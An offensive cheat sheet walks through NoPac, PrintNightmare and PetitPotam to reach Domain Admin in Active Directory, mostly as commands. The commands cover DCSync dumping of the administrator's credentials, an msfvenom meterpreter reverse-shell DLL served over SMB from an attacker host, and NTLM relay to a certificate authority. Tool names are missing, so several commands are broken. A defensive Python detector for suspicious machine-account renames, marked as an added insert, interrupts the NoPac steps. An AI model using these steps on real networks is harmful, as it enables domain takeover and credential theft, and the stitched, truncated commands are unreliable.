Privilege Escalation to Domain Admin using Known Exploits


  • NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin-level access.

  • This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.

  • The flow of the attack is outlined here: SecureWorks Blog

Exploiting NoPac:

  1. Get the NoPac exploit: git clone

  2. Check if target is vulnerable: sudo python3 -dc-ip -use-ldap

  3. Get a SYSTEM shell as the built-in administrator: sudo python3 DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME -shell --impersonate administrator -use-ldap

  4. Perform DCSync against the built-in administrator: sudo python3 DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator
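From the defender's side, the precondition of this path (a machine account whose SamAccountName is changed to look like a Domain Controller) leaves an audit trail. The following added detection example is not part of the original page; it runs over constructed log lines in a simplified key=value form that loosely mirrors Windows Security Event ID 4781 ("The name of an account was changed"), and the list of DC names is a hypothetical value a defender would load from AD.

```python
# Added example (not from the original page): flag account-rename events
# where a computer account is renamed to a DC name or loses its trailing "$".
import re
from dataclasses import dataclass

# Hypothetical list of Domain Controller names; load from AD in practice.
KNOWN_DC_NAMES = {"DC01", "DC02"}

# CONSTRUCTED sample records in a simplified form of Event ID 4781 data.
SAMPLE_EVENTS = """\
EventID=4781 Subject=jdoe OldName=WS-LAPTOP7$ NewName=WS-LAPTOP8$
EventID=4781 Subject=jdoe OldName=WS-LAPTOP8$ NewName=DC01
EventID=4781 Subject=admin OldName=svc_old NewName=svc_new
EventID=4781 Subject=jdoe OldName=DC01 NewName=WS-LAPTOP8$
EventID=4781 Subject=jdoe OldName=WS-LAPTOP9$ NewName=FILESRV
EventID=4742 Subject=jdoe Account=WS-LAPTOP8$ ChangedAttr=sAMAccountName
"""

LINE_RE = re.compile(r"EventID=(\d+) Subject=(\S+) OldName=(\S+) NewName=(\S+)")

@dataclass
class Finding:
    subject: str
    old_name: str
    new_name: str
    reason: str

def is_computer_account(name: str) -> bool:
    # Machine accounts in AD carry a trailing "$"; user accounts do not.
    return name.endswith("$")

def find_suspicious_renames(log_text: str, dc_names=KNOWN_DC_NAMES):
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "4781":
            continue  # only account-rename events matter for this check
        subject, old, new = m.group(2), m.group(3), m.group(4)
        if not is_computer_account(old):
            continue  # user-account renames (and the revert step) are skipped
        if new.upper() in dc_names:
            findings.append(Finding(subject, old, new, "computer renamed to a DC name"))
        elif not is_computer_account(new):
            findings.append(Finding(subject, old, new, "computer account lost trailing $"))
    return findings

if __name__ == "__main__":
    for f in find_suspicious_renames(SAMPLE_EVENTS):
        print(f"{f.subject}: {f.old_name} -> {f.new_name} ({f.reason})")
```

Pair this with an alert on the rename back to the original name, which the constructed fourth line shows and which the cleanup step of the path also produces.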


  • A vulnerability in the Print Spooler service, which runs on all Windows operating systems, that allows privilege escalation and remote code execution.

Exploiting PrintNightmare:

  1. Get the exploit: git clone

  2. Install cube0x0's version of impacket:

    pip3 uninstall impacket
    git clone
    cd impacket
    python3 ./ install
  3. Check if the Windows target has MS-PAR & MS-RPRN exposed: @ | egrep 'MS-RPRN|MS-PAR'

  4. Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll

  5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download: sudo -smb2support Data /path/to/backupscript.dll

  6. Run the exploit: sudo python3 '\\attacker-ip\CompData\backupscript.dll'


  • PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445.

  • This attack allows an unauthenticated user to take over the domain.

  • More information about PetitPotam can be found here: DirkJanm Post

Exploiting PetitPotam:

  1. Start an NTLM relay: sudo -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authority/host --adcs --template DomainController. Note: you can use certi to find the location of the CA.

  2. Get Petit Potam: git clone

  3. Run Petit Potam: python3 attacker-ip dc-ip

  4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell

  5. Request a TGT for the domain controller using the certificate: python3 /PKINITtools/ DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache

  6. Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache

  7. Perform DCSync using (-k) the previous ccache file: -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME
